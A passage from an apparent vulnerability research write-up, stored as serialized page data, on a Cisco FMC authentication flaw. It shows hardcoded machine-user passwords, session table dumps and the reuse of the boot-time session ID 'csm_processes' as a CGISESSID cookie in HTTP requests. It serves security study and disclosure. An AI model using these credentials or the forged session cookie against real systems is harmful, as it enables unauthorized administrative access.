\"csmdaemon\");\n",[886,5046,5047,5052,5093,5115,5153,5173,5211,5231,5269,5289,5325],{"__ignoreMap":219},[1373,5048,5049],{"class":1375,"line":1376},[1373,5050,5051],{"class":4630},"# Now create other system users\n",[1373,5053,5054,5057,5059,5062,5064,5066,5068,5071,5073,5075,5077,5080,5082,5084,5086,5088,5090],{"class":1375,"line":220},[1373,5055,5056],{"class":4640},"create_user(",[1373,5058,183],{"class":1387},[1373,5060,5061],{"class":1391},"report",[1373,5063,183],{"class":1387},[1373,5065,1246],{"class":4640},[1373,5067,183],{"class":1387},[1373,5069,5070],{"class":1391},"ReportUser",[1373,5072,183],{"class":1387},[1373,5074,1246],{"class":4640},[1373,5076,183],{"class":1387},[1373,5078,5079],{"class":1391},"none",[1373,5081,183],{"class":1387},[1373,5083,1246],{"class":4640},[1373,5085,183],{"class":1387},[1373,5087,5079],{"class":1391},[1373,5089,183],{"class":1387},[1373,5091,5092],{"class":4640},", SF::Auth::AUTH_IS_MACHINE, 0);\n",[1373,5094,5095,5098,5100,5102,5104,5106,5108,5111,5113],{"class":1375,"line":1266},[1373,5096,5097],{"class":4640},"change_password(",[1373,5099,183],{"class":1387},[1373,5101,5061],{"class":1391},[1373,5103,183],{"class":1387},[1373,5105,1246],{"class":4640},[1373,5107,183],{"class":1387},[1373,5109,5110],{"class":1391},"snortrules",[1373,5112,183],{"class":1387},[1373,5114,4680],{"class":4640},[1373,5116,5117,5119,5121,5124,5126,5128,5130,5133,5135,5137,5139,5141,5143,5145,5147,5149,5151],{"class":1375,"line":1852},[1373,5118,5056],{"class":4640},[1373,5120,183],{"class":1387},[1373,5122,5123],{"class":1391},"sftop10user",[1373,5125,183],{"class":1387},[1373,5127,1246],{"class":4640},[1373,5129,183],{"class":1387},[1373,5131,5132],{"class":1391},"Top10User",[1373,5134,183],{"class":1387},[1373,5136,1246],{"class":4640},[1373,5138,183],{"class":1387},[1373,5140,5079],{"class":1391},[1373,5142,183],{"class":1387},[1373,5144,1246],{"class":4640},[1373,5146,183],{"class":1387},[1373,5148,5079],{"class":1391},[1373,5150,183],{"class":1387},[1373,5152,5092],{"class":4640},[1373,5154,5155,5157,5159,5161,5163,5165,5167,5169,5171],{"class":1375,"line":4692},[1373,5156,5097],{"class":4640},[1373,5158,183],{"class":1387},[1373,5160,5123],{"class":1391},[1373,5162,183],{"class":1387},[1373,5164,1246],{"class":4640},[1373,5166,183],{"class":1387},[1373,5168,5110],{"class":1391},[1373,5170,183],{"class":1387},[1373,5172,4680],{"class":4640},[1373,5174,5175,5177,5179,5182,5184,5186,5188,5191,5193,5195,5197,5199,5201,5203,5205,5207,5209],{"class":1375,"line":4724},[1373,5176,5056],{"class":4640},[1373,5178,183],{"class":1387},[1373,5180,5181],{"class":1391},"SRU",[1373,5183,183],{"class":1387},[1373,5185,1246],{"class":4640},[1373,5187,183],{"class":1387},[1373,5189,5190],{"class":1391},"SRUuser",[1373,5192,183],{"class":1387},[1373,5194,1246],{"class":4640},[1373,5196,183],{"class":1387},[1373,5198,5079],{"class":1391},[1373,5200,183],{"class":1387},[1373,5202,1246],{"class":4640},[1373,5204,183],{"class":1387},[1373,5206,5079],{"class":1391},[1373,5208,183],{"class":1387},[1373,5210,5092],{"class":4640},[1373,5212,5213,5215,5217,5219,5221,5223,5225,5227,5229],{"class":1375,"line":4756},[1373,5214,5097],{"class":4640},[1373,5216,183],{"class":1387},[1373,5218,5181],{"class":1391},[1373,5220,183],{"class":1387},[1373,5222,1246],{"class":4640},[1373,5224,183],{"class":1387},[1373,5226,5110],{"class":1391},[1373,5228,183],{"class":1387},[1373,5230,4680],{"class":4640},[1373,5232,5233,5235,5237,5240,5242,5244,5246,5249,5251,5253,5255,5257,5259,5261,5263,5265,5267],{"class":1375,"line":4768},[1373,5234,5056],{"class":4640},[1373,5236,183],{"class":1387},[1373,5238,5239],{"class":1391},"Sourcefire",[1373,5241,183],{"class":1387},[1373,5243,1246],{"class":4640},[1373,5245,183],{"class":1387},[1373,5247,5248],{"class":1391},"SourcefireUser",[1373,5250,183],{"class":1387},[1373,5252,1246],{"class":4640},[1373,5254,183],{"class":1387},[1373,5256,5079],{"class":1391},[1373,5258,183],{"class":1387},[1373,5260,1246],{"class":4640},[1373,5262,183],{"class":1387},[1373,5264,5079],{"class":1391},[1373,5266,183],{"class":1387},[1373,5268,5092],{"class":4640},[1373,5270,5271,5273,5275,5277,5279,5281,5283,5285,5287],{"class":1375,"line":4792},[1373,5272,5097],{"class":4640},[1373,5274,183],{"class":1387},[1373,5276,5239],{"class":1391},[1373,5278,183],{"class":1387},[1373,5280,1246],{"class":4640},[1373,5282,183],{"class":1387},[1373,5284,5110],{"class":1391},[1373,5286,183],{"class":1387},[1373,5288,4680],{"class":4640},[1373,5290,5291,5293,5295,5297,5299,5301,5303,5305,5307,5309,5311,5313,5315,5317,5319,5321,5323],{"class":1375,"line":4798},[1373,5292,5056],{"class":4640},[1373,5294,183],{"class":1387},[1373,5296,4442],{"class":1391},[1373,5298,183],{"class":1387},[1373,5300,1246],{"class":4640},[1373,5302,183],{"class":1387},[1373,5304,4442],{"class":1391},[1373,5306,183],{"class":1387},[1373,5308,1246],{"class":4640},[1373,5310,183],{"class":1387},[1373,5312,5079],{"class":1391},[1373,5314,183],{"class":1387},[1373,5316,1246],{"class":4640},[1373,5318,183],{"class":1387},[1373,5320,5079],{"class":1391},[1373,5322,183],{"class":1387},[1373,5324,5092],{"class":4640},[1373,5326,5327,5329,5331,5333,5335,5337,5339,5342,5344],{"class":1375,"line":4806},[1373,5328,5097],{"class":4640},[1373,5330,183],{"class":1387},[1373,5332,4442],{"class":1391},[1373,5334,183],{"class":1387},[1373,5336,1246],{"class":4640},[1373,5338,183],{"class":1387},[1373,5340,5341],{"class":1391},"csmdaemon",[1373,5343,183],{"class":1387},[1373,5345,4680],{"class":4640},[18,5347,5348,5349,5352],{},"These hardcoded credentials corresponded to the hashes stored in the FMC system’s MySQL server in the ",[886,5350,5351],{},"sfsnort.users"," database table, meaning that they are at least partially hardcoded. Immediately, our first instinct was to try authenticating with every authentication entry point we could find with these credentials, but no dice: Machine users are unable to authenticate to the web interface and are not allowed to interact with the routed API services. By inspecting theApache logs and packet captures, we could see that these processes were run locally, and each of these users would occasionally interact with portions of the API from the local machine perspective.",[18,5354,5355,5356,59],{},"This gave us a few hints about where these machine user accounts were created and some of their common uses. The next step was to figure out what \"This vulnerability is due to an improper system process that is created at boot time\" meant in Cisco’s ",[47,5357,5359],{"href":4546,"rel":5358},[51],"advisory",[18,5361,5362,5363,5366,5367,5369],{},"During boot time, a few of the above accounts run scripts of the startup process for FMC. Only the Go binary ",[886,5364,5365],{},"\u002FVolume\u002F7.7.11-1061\u002Fsf\u002Fbin\u002Fauth-daemon"," handles a large number of initial startup actions. One of the primary actions is to create a session for the ",[886,5368,4442],{}," user to kick-off its first-start logic, which ends in the following database entry containing the Perl serialized session information:",[1354,5371,5375],{"className":5372,"code":5373,"language":5374,"meta":219,"style":219},"language-sql shiki shiki-themes material-theme-lighter github-light github-dark monokai","MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions;\n| a_session\n| $D = {'username' => 'csm_processes','original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','session_expire_check' => 1,'useruuid' => '8acb8f4a-c40d-11e3-95aa-54f999c07ac9','usertype' => 2,'_SESSION_CTIME' => 1773962523,'_SESSION_ATIME' => 1773962523,'_SESSION_ID' => 'csm_processes','active' => 0,'_SESSION_REMOTE_ADDR' => '','_SESSION_EXPIRE_LIST' => {},'VMS_SESSION_ID' => 'csm_processes','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f'};;$D |\n","sql",[886,5376,5377,5405,5410],{"__ignoreMap":219},[1373,5378,5379,5382,5385,5389,5392,5395,5398,5400,5403],{"class":1375,"line":1376},[1373,5380,5381],{"class":4640},"MariaDB [(none)]",[1373,5383,5384],{"class":1397},">",[1373,5386,5388],{"class":5387},"shWJe"," SELECT",[1373,5390,5391],{"class":4640}," a_session ",[1373,5393,5394],{"class":5387},"FROM",[1373,5396,5397],{"class":2326}," sfsnort",[1373,5399,59],{"class":4640},[1373,5401,5402],{"class":2326},"sessions",[1373,5404,4912],{"class":4640},[1373,5406,5407],{"class":1375,"line":220},[1373,5408,5409],{"class":4640},"| a_session\n",[1373,5411,5412,5415,5418,5421,5423,5425,5427,5429,5431,5433,5435,5438,5440,5443,5445,5447,5449,5452,5454,5456,5458,5461,5463,5465,5469,5471,5473,5476,5478,5480,5482,5485,5487,5489,5491,5493,5495,5497,5500,5502,5504,5507,5509,5511,5514,5516,5518,5521,5523,5525,5527,5529,5531,5534,5536,5538,5540,5542,5544,5546,5548,5551,5553,5555,5558,5560,5562,5565,5567,5569,5572,5574,5576,5579,5581,5583,5586,5588,5591,5593,5595,5597,5599,5601,5603,5605,5608,5610,5612,5614,5616,5618],{"class":1375,"line":1266},[1373,5413,5414],{"class":4640},"| $D ",[1373,5416,5417],{"class":1397},"=",[1373,5419,5420],{"class":4640}," {",[1373,5422,1388],{"class":1387},[1373,5424,4870],{"class":1391},[1373,5426,1388],{"class":1387},[1373,5428,4986],{"class":1397},[1373,5430,4713],{"class":1387},[1373,5432,4442],{"class":1391},[1373,5434,1388],{"class":1387},[1373,5436,5437],{"class":4640},",",[1373,5439,1388],{"class":1387},[1373,5441,5442],{"class":1391},"original_domain",[1373,5444,1388],{"class":1387},[1373,5446,4986],{"class":1397},[1373,5448,4713],{"class":1387},[1373,5450,5451],{"class":1391},"e276abec-e0f2-11e3-8169-6d9ed49b625f",[1373,5453,1388],{"class":1387},[1373,5455,5437],{"class":4640},[1373,5457,1388],{"class":1387},[1373,5459,5460],{"class":1391},"session_expire_check",[1373,5462,1388],{"class":1387},[1373,5464,4986],{"class":1397},[1373,5466,5468],{"class":5467},"sYThS"," 1",[1373,5470,5437],{"class":4640},[1373,5472,1388],{"class":1387},[1373,5474,5475],{"class":1391},"useruuid",[1373,5477,1388],{"class":1387},[1373,5479,4986],{"class":1397},[1373,5481,4713],{"class":1387},[1373,5483,5484],{"class":1391},"8acb8f4a-c40d-11e3-95aa-54f999c07ac9",[1373,5486,1388],{"class":1387},[1373,5488,5437],{"class":4640},[1373,5490,1388],{"class":1387},[1373,5492,4675],{"class":1391},[1373,5494,1388],{"class":1387},[1373,5496,4986],{"class":1397},[1373,5498,5499],{"class":5467}," 2",[1373,5501,5437],{"class":4640},[1373,5503,1388],{"class":1387},[1373,5505,5506],{"class":1391},"_SESSION_CTIME",[1373,5508,1388],{"class":1387},[1373,5510,4986],{"class":1397},[1373,5512,5513],{"class":5467}," 1773962523",[1373,5515,5437],{"class":4640},[1373,5517,1388],{"class":1387},[1373,5519,5520],{"class":1391},"_SESSION_ATIME",[1373,5522,1388],{"class":1387},[1373,5524,4986],{"class":1397},[1373,5526,5513],{"class":5467},[1373,5528,5437],{"class":4640},[1373,5530,1388],{"class":1387},[1373,5532,5533],{"class":1391},"_SESSION_ID",[1373,5535,1388],{"class":1387},[1373,5537,4986],{"class":1397},[1373,5539,4713],{"class":1387},[1373,5541,4442],{"class":1391},[1373,5543,1388],{"class":1387},[1373,5545,5437],{"class":4640},[1373,5547,1388],{"class":1387},[1373,5549,5550],{"class":1391},"active",[1373,5552,1388],{"class":1387},[1373,5554,4986],{"class":1397},[1373,5556,5557],{"class":5467}," 0",[1373,5559,5437],{"class":4640},[1373,5561,1388],{"class":1387},[1373,5563,5564],{"class":1391},"_SESSION_REMOTE_ADDR",[1373,5566,1388],{"class":1387},[1373,5568,4986],{"class":1397},[1373,5570,5571],{"class":1387}," ''",[1373,5573,5437],{"class":4640},[1373,5575,1388],{"class":1387},[1373,5577,5578],{"class":1391},"_SESSION_EXPIRE_LIST",[1373,5580,1388],{"class":1387},[1373,5582,4986],{"class":1397},[1373,5584,5585],{"class":4640}," {},",[1373,5587,1388],{"class":1387},[1373,5589,5590],{"class":1391},"VMS_SESSION_ID",[1373,5592,1388],{"class":1387},[1373,5594,4986],{"class":1397},[1373,5596,4713],{"class":1387},[1373,5598,4442],{"class":1391},[1373,5600,1388],{"class":1387},[1373,5602,5437],{"class":4640},[1373,5604,1388],{"class":1387},[1373,5606,5607],{"class":1391},"current_domain",[1373,5609,1388],{"class":1387},[1373,5611,4986],{"class":1397},[1373,5613,4713],{"class":1387},[1373,5615,5451],{"class":1391},[1373,5617,1388],{"class":1387},[1373,5619,5620],{"class":4640},"};;$D |\n",[18,5622,5623,5624,5626,5627,5630],{},"Notably, the ",[886,5625,4446],{}," database and table are the same locations where valid web UI authentications happen. No other machine accounts appear to have sessions created in this portion of the database, and the only other ",[886,5628,5629],{},"a_session"," objects that get created are from user web authentication. A few things about the above:",[1789,5632,5633,5641],{},[25,5634,5635,5637,5638,5640],{},[886,5636,5550],{}," set to ",[886,5639,445],{}," means that the session is active",[25,5642,5643,5637,5645,5647,5648,5651],{},[886,5644,5460],{},[886,5646,467],{}," means that the session expiration ",[1131,5649,5650],{},"is"," checked",[18,5653,5654],{},"Additionally, when a user logs into the web UI, normally the session looks like the following:",[1354,5656,5658],{"className":5372,"code":5657,"language":5374,"meta":219,"style":219},"MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions;\n| a_session |\n| $D = {'active' => 0,'last_csm_refresh' => 1774465805,'sf_action_id' => 'a490cd6e67ccde81d131684846d7a13c','original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','_SESSION_CTIME' => 1774465805,'_SESSION_EXPIRE_LIST' => {'session_expire_check' => 3600},'username' => 'admin','session_expire_check' => 1,'user_access_type' => 'rw','last_login' => {'last_login_time' => 1773962153,'remote_host_ip' => '10.0.1.10'},'useruuid' => '68d03c42-d9bd-11dc-89f2-b7961d42c462','_SESSION_REMOTE_ADDR' => '10.0.1.10','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','domains' => '[{\"name\":\"Global\",\"uuid\":\"e276abec-e0f2-11e3-8169-6d9ed49b625f\"}]','_SESSION_ATIME' => 1774465819,'IS_WORKFLOW_MODE' => 'false','VMS_SESSION_ID' => '-1102361566','usertype' => 1,'_SESSION_ID' => '80a3ec54ed31807a655fb7d2018c69cf','_SESSION_ETIME' => 3900};;$D |\n| $D = {'_SESSION_ATIME' => 1774465771,'original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','useruuid' => '8acb8f4a-c40d-11e3-95aa-54f999c07ac9','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','_SESSION_EXPIRE_LIST' => {},'usertype' => 2,'_SESSION_CTIME' => 1774465771,'active' => 0,'_SESSION_ID' => 'csm_processes','VMS_SESSION_ID' => 'csm_processes','session_expire_check' => 1,'_SESSION_REMOTE_ADDR' => '','username' => 'csm_processes'};;$D |\n",[886,5659,5660,5680,5685,6036],{"__ignoreMap":219},[1373,5661,5662,5664,5666,5668,5670,5672,5674,5676,5678],{"class":1375,"line":1376},[1373,5663,5381],{"class":4640},[1373,5665,5384],{"class":1397},[1373,5667,5388],{"class":5387},[1373,5669,5391],{"class":4640},[1373,5671,5394],{"class":5387},[1373,5673,5397],{"class":2326},[1373,5675,59],{"class":4640},[1373,5677,5402],{"class":2326},[1373,5679,4912],{"class":4640},[1373,5681,5682],{"class":1375,"line":220},[1373,5683,5684],{"class":4640},"| a_session |\n",[1373,5686,5687,5689,5691,5693,5695,5697,5699,5701,5703,5705,5707,5710,5712,5714,5717,5719,5721,5723,5725,5727,5729,5732,5734,5736,5738,5740,5742,5744,5746,5748,5750,5752,5754,5756,5758,5760,5762,5764,5766,5768,5770,5772,5774,5776,5778,5780,5782,5785,5788,5790,5792,5794,5796,5798,5801,5803,5805,5807,5809,5811,5813,5815,5817,5819,5822,5824,5826,5828,5831,5833,5835,5837,5840,5842,5844,5846,5848,5851,5853,5855,5858,5860,5862,5865,5867,5869,5871,5874,5876,5878,5880,5882,5884,5886,5888,5891,5893,5895,5897,5899,5901,5903,5905,5907,5909,5911,5913,5915,5917,5919,5921,5923,5925,5927,5929,5932,5934,5936,5938,5941,5943,5945,5947,5949,5951,5953,5956,5958,5960,5963,5965,5967,5969,5972,5974,5976,5978,5980,5982,5984,5986,5989,5991,5993,5995,5997,5999,6001,6003,6005,6007,6009,6011,6013,6015,6018,6020,6022,6024,6027,6029,6031,6034],{"class":1375,"line":1266},[1373,5688,5414],{"class":4640},[1373,5690,5417],{"class":1397},[1373,5692,5420],{"class":4640},[1373,5694,1388],{"class":1387},[1373,5696,5550],{"class":1391},[1373,5698,1388],{"class":1387},[1373,5700,4986],{"class":1397},[1373,5702,5557],{"class":5467},[1373,5704,5437],{"class":4640},[1373,5706,1388],{"class":1387},[1373,5708,5709],{"class":1391},"last_csm_refresh",[1373,5711,1388],{"class":1387},[1373,5713,4986],{"class":1397},[1373,5715,5716],{"class":5467}," 1774465805",[1373,5718,5437],{"class":4640},[1373,5720,1388],{"class":1387},[1373,5722,4468],{"class":1391},[1373,5724,1388],{"class":1387},[1373,5726,4986],{"class":1397},[1373,5728,4713],{"class":1387},[1373,5730,5731],{"class":1391},"a490cd6e67ccde81d131684846d7a13c",[1373,5733,1388],{"class":1387},[1373,5735,5437],{"class":4640},[1373,5737,1388],{"class":1387},[1373,5739,5442],{"class":1391},[1373,5741,1388],{"class":1387},[1373,5743,4986],{"class":1397},[1373,5745,4713],{"class":1387},[1373,5747,5451],{"class":1391},[1373,5749,1388],{"class":1387},[1373,5751,5437],{"class":4640},[1373,5753,1388],{"class":1387},[1373,5755,5506],{"class":1391},[1373,5757,1388],{"class":1387},[1373,5759,4986],{"class":1397},[1373,5761,5716],{"class":5467},[1373,5763,5437],{"class":4640},[1373,5765,1388],{"class":1387},[1373,5767,5578],{"class":1391},[1373,5769,1388],{"class":1387},[1373,5771,4986],{"class":1397},[1373,5773,5420],{"class":4640},[1373,5775,1388],{"class":1387},[1373,5777,5460],{"class":1391},[1373,5779,1388],{"class":1387},[1373,5781,4986],{"class":1397},[1373,5783,5784],{"class":5467}," 3600",[1373,5786,5787],{"class":4640},"},",[1373,5789,1388],{"class":1387},[1373,5791,4870],{"class":1391},[1373,5793,1388],{"class":1387},[1373,5795,4986],{"class":1397},[1373,5797,4713],{"class":1387},[1373,5799,5800],{"class":1391},"admin",[1373,5802,1388],{"class":1387},[1373,5804,5437],{"class":4640},[1373,5806,1388],{"class":1387},[1373,5808,5460],{"class":1391},[1373,5810,1388],{"class":1387},[1373,5812,4986],{"class":1397},[1373,5814,5468],{"class":5467},[1373,5816,5437],{"class":4640},[1373,5818,1388],{"class":1387},[1373,5820,5821],{"class":1391},"user_access_type",[1373,5823,1388],{"class":1387},[1373,5825,4986],{"class":1397},[1373,5827,4713],{"class":1387},[1373,5829,5830],{"class":1391},"rw",[1373,5832,1388],{"class":1387},[1373,5834,5437],{"class":4640},[1373,5836,1388],{"class":1387},[1373,5838,5839],{"class":1391},"last_login",[1373,5841,1388],{"class":1387},[1373,5843,4986],{"class":1397},[1373,5845,5420],{"class":4640},[1373,5847,1388],{"class":1387},[1373,5849,5850],{"class":1391},"last_login_time",[1373,5852,1388],{"class":1387},[1373,5854,4986],{"class":1397},[1373,5856,5857],{"class":5467}," 1773962153",[1373,5859,5437],{"class":4640},[1373,5861,1388],{"class":1387},[1373,5863,5864],{"class":1391},"remote_host_ip",[1373,5866,1388],{"class":1387},[1373,5868,4986],{"class":1397},[1373,5870,4713],{"class":1387},[1373,5872,5873],{"class":1391},"10.0.1.10",[1373,5875,1388],{"class":1387},[1373,5877,5787],{"class":4640},[1373,5879,1388],{"class":1387},[1373,5881,5475],{"class":1391},[1373,5883,1388],{"class":1387},[1373,5885,4986],{"class":1397},[1373,5887,4713],{"class":1387},[1373,5889,5890],{"class":1391},"68d03c42-d9bd-11dc-89f2-b7961d42c462",[1373,5892,1388],{"class":1387},[1373,5894,5437],{"class":4640},[1373,5896,1388],{"class":1387},[1373,5898,5564],{"class":1391},[1373,5900,1388],{"class":1387},[1373,5902,4986],{"class":1397},[1373,5904,4713],{"class":1387},[1373,5906,5873],{"class":1391},[1373,5908,1388],{"class":1387},[1373,5910,5437],{"class":4640},[1373,5912,1388],{"class":1387},[1373,5914,5607],{"class":1391},[1373,5916,1388],{"class":1387},[1373,5918,4986],{"class":1397},[1373,5920,4713],{"class":1387},[1373,5922,5451],{"class":1391},[1373,5924,1388],{"class":1387},[1373,5926,5437],{"class":4640},[1373,5928,1388],{"class":1387},[1373,5930,5931],{"class":1391},"domains",[1373,5933,1388],{"class":1387},[1373,5935,4986],{"class":1397},[1373,5937,4713],{"class":1387},[1373,5939,5940],{"class":1391},"[{\"name\":\"Global\",\"uuid\":\"e276abec-e0f2-11e3-8169-6d9ed49b625f\"}]",[1373,5942,1388],{"class":1387},[1373,5944,5437],{"class":4640},[1373,5946,1388],{"class":1387},[1373,5948,5520],{"class":1391},[1373,5950,1388],{"class":1387},[1373,5952,4986],{"class":1397},[1373,5954,5955],{"class":5467}," 1774465819",[1373,5957,5437],{"class":4640},[1373,5959,1388],{"class":1387},[1373,5961,5962],{"class":1391},"IS_WORKFLOW_MODE",[1373,5964,1388],{"class":1387},[1373,5966,4986],{"class":1397},[1373,5968,4713],{"class":1387},[1373,5970,5971],{"class":1391},"false",[1373,5973,1388],{"class":1387},[1373,5975,5437],{"class":4640},[1373,5977,1388],{"class":1387},[1373,5979,5590],{"class":1391},[1373,5981,1388],{"class":1387},[1373,5983,4986],{"class":1397},[1373,5985,4713],{"class":1387},[1373,5987,5988],{"class":1391},"-1102361566",[1373,5990,1388],{"class":1387},[1373,5992,5437],{"class":4640},[1373,5994,1388],{"class":1387},[1373,5996,4675],{"class":1391},[1373,5998,1388],{"class":1387},[1373,6000,4986],{"class":1397},[1373,6002,5468],{"class":5467},[1373,6004,5437],{"class":4640},[1373,6006,1388],{"class":1387},[1373,6008,5533],{"class":1391},[1373,6010,1388],{"class":1387},[1373,6012,4986],{"class":1397},[1373,6014,4713],{"class":1387},[1373,6016,6017],{"class":1391},"80a3ec54ed31807a655fb7d2018c69cf",[1373,6019,1388],{"class":1387},[1373,6021,5437],{"class":4640},[1373,6023,1388],{"class":1387},[1373,6025,6026],{"class":1391},"_SESSION_ETIME",[1373,6028,1388],{"class":1387},[1373,6030,4986],{"class":1397},[1373,6032,6033],{"class":5467}," 3900",[1373,6035,5620],{"class":4640},[1373,6037,6038,6040,6042,6044,6046,6048,6050,6052,6055,6057,6059,6061,6063,6065,6067,6069,6071,6073,6075,6077,6079,6081,6083,6085,6087,6089,6091,6093,6095,6097,6099,6101,6103,6105,6107,6109,6111,6113,6115,6117,6119,6121,6123,6125,6127,6129,6131,6133,6135,6137,6139,6141,6143,6145,6147,6149,6151,6153,6155,6157,6159,6161,6163,6165,6167,6169,6171,6173,6175,6177,6179,6181,6183,6185,6187,6189,6191,6193,6195,6197,6199,6201,6203,6205,6207,6209,6211,6213,6215,6217,6219,6221],{"class":1375,"line":1852},[1373,6039,5414],{"class":4640},[1373,6041,5417],{"class":1397},[1373,6043,5420],{"class":4640},[1373,6045,1388],{"class":1387},[1373,6047,5520],{"class":1391},[1373,6049,1388],{"class":1387},[1373,6051,4986],{"class":1397},[1373,6053,6054],{"class":5467}," 1774465771",[1373,6056,5437],{"class":4640},[1373,6058,1388],{"class":1387},[1373,6060,5442],{"class":1391},[1373,6062,1388],{"class":1387},[1373,6064,4986],{"class":1397},[1373,6066,4713],{"class":1387},[1373,6068,5451],{"class":1391},[1373,6070,1388],{"class":1387},[1373,6072,5437],{"class":4640},[1373,6074,1388],{"class":1387},[1373,6076,5475],{"class":1391},[1373,6078,1388],{"class":1387},[1373,6080,4986],{"class":1397},[1373,6082,4713],{"class":1387},[1373,6084,5484],{"class":1391},[1373,6086,1388],{"class":1387},[1373,6088,5437],{"class":4640},[1373,6090,1388],{"class":1387},[1373,6092,5607],{"class":1391},[1373,6094,1388],{"class":1387},[1373,6096,4986],{"class":1397},[1373,6098,4713],{"class":1387},[1373,6100,5451],{"class":1391},[1373,6102,1388],{"class":1387},[1373,6104,5437],{"class":4640},[1373,6106,1388],{"class":1387},[1373,6108,5578],{"class":1391},[1373,6110,1388],{"class":1387},[1373,6112,4986],{"class":1397},[1373,6114,5585],{"class":4640},[1373,6116,1388],{"class":1387},[1373,6118,4675],{"class":1391},[1373,6120,1388],{"class":1387},[1373,6122,4986],{"class":1397},[1373,6124,5499],{"class":5467},[1373,6126,5437],{"class":4640},[1373,6128,1388],{"class":1387},[1373,6130,5506],{"class":1391},[1373,6132,1388],{"class":1387},[1373,6134,4986],{"class":1397},[1373,6136,6054],{"class":5467},[1373,6138,5437],{"class":4640},[1373,6140,1388],{"class":1387},[1373,6142,5550],{"class":1391},[1373,6144,1388],{"class":1387},[1373,6146,4986],{"class":1397},[1373,6148,5557],{"class":5467},[1373,6150,5437],{"class":4640},[1373,6152,1388],{"class":1387},[1373,6154,5533],{"class":1391},[1373,6156,1388],{"class":1387},[1373,6158,4986],{"class":1397},[1373,6160,4713],{"class":1387},[1373,6162,4442],{"class":1391},[1373,6164,1388],{"class":1387},[1373,6166,5437],{"class":4640},[1373,6168,1388],{"class":1387},[1373,6170,5590],{"class":1391},[1373,6172,1388],{"class":1387},[1373,6174,4986],{"class":1397},[1373,6176,4713],{"class":1387},[1373,6178,4442],{"class":1391},[1373,6180,1388],{"class":1387},[1373,6182,5437],{"class":4640},[1373,6184,1388],{"class":1387},[1373,6186,5460],{"class":1391},[1373,6188,1388],{"class":1387},[1373,6190,4986],{"class":1397},[1373,6192,5468],{"class":5467},[1373,6194,5437],{"class":4640},[1373,6196,1388],{"class":1387},[1373,6198,5564],{"class":1391},[1373,6200,1388],{"class":1387},[1373,6202,4986],{"class":1397},[1373,6204,5571],{"class":1387},[1373,6206,5437],{"class":4640},[1373,6208,1388],{"class":1387},[1373,6210,4870],{"class":1391},[1373,6212,1388],{"class":1387},[1373,6214,4986],{"class":1397},[1373,6216,4713],{"class":1387},[1373,6218,4442],{"class":1391},[1373,6220,1388],{"class":1387},[1373,6222,5620],{"class":4640},[18,6224,6225],{},"This shows that a few more things are missing or different between the machine user authentication and the admin user authentication:",[22,6227,6228,6240],{},[25,6229,6230,1246,6232,1246,6234,6236,6237,6239],{},[886,6231,5821],{},[886,6233,4468],{},[886,6235,5931],{},", and more are not present in the ",[886,6238,4442],{}," session object.",[25,6241,6242,6243,6245,6246],{},"Some of the values appear to differ in content type, notably ",[886,6244,5533],{}," parameters and ",[886,6247,5533],{},[18,6249,6250,6251,6253,6254,6257,6258,6261,6262,6265],{},"The most interesting part for now is that the ",[886,6252,5533],{}," value corresponds to the web UI admin user’s ",[886,6255,6256],{},"CGISESSID=80a3ec54ed31807a655fb7d2018c69cf"," cookie value and is generated dynamically for normal user authentication. Immediately, we attempt to set ",[886,6259,6260],{},"CGISESSID"," to be ",[886,6263,6264],{},"CGISESSID=csm_processes"," in order to correspond to the startup process value.",[18,6267,6268,6269,6272],{},"Sure enough, a request to the ",[886,6270,6271],{},"\u002Fhelp\u002Fabout.cgi"," CGI endpoint without a cookie set returns an invalid session error:",[1354,6274,6278],{"className":6275,"code":6276,"language":6277,"meta":219,"style":219},"language-http shiki shiki-themes material-theme-lighter github-light github-dark monokai","GET \u002Fhelp\u002Fabout.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n\n\n","http",[886,6279,6280,6296,6307,6317,6327],{"__ignoreMap":219},[1373,6281,6282,6285,6288,6291,6293],{"class":1375,"line":1376},[1373,6283,6284],{"class":4636},"GET",[1373,6286,6287],{"class":4640}," \u002Fhelp\u002Fabout.cgi ",[1373,6289,6290],{"class":5387},"HTTP",[1373,6292,2180],{"class":4640},[1373,6294,6295],{"class":5467},"1.1\n",[1373,6297,6298,6302,6304],{"class":1375,"line":220},[1373,6299,6301],{"class":6300},"sHsBP","Host",[1373,6303,4606],{"class":5387},[1373,6305,6306],{"class":1391}," 10.0.0.226\n",[1373,6308,6309,6312,6314],{"class":1375,"line":1266},[1373,6310,6311],{"class":6300},"User-Agent",[1373,6313,4606],{"class":5387},[1373,6315,6316],{"class":1391}," Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\n",[1373,6318,6319,6322,6324],{"class":1375,"line":1852},[1373,6320,6321],{"class":6300},"Accept-Encoding",[1373,6323,4606],{"class":5387},[1373,6325,6326],{"class":1391}," gzip, deflate, br\n",[1373,6328,6329,6332,6334],{"class":1375,"line":4692},[1373,6330,6331],{"class":6300},"Connection",[1373,6333,4606],{"class":5387},[1373,6335,6336],{"class":1391}," keep-alive\n",[1354,6338,6340],{"className":6275,"code":6339,"language":6277,"meta":219,"style":219},"HTTP\u002F1.1 302 Found\nDate: Wed, 25 Mar 2026 19:30:07 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nContent-Type: text\u002Fplain; charset=utf-8\nLocation: \u002Fui\u002Flogin?target=%2Fmojo-async%2Fhelp%2Fabout.cgi\nContent-Length: 19\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\n\nInvalid session ID 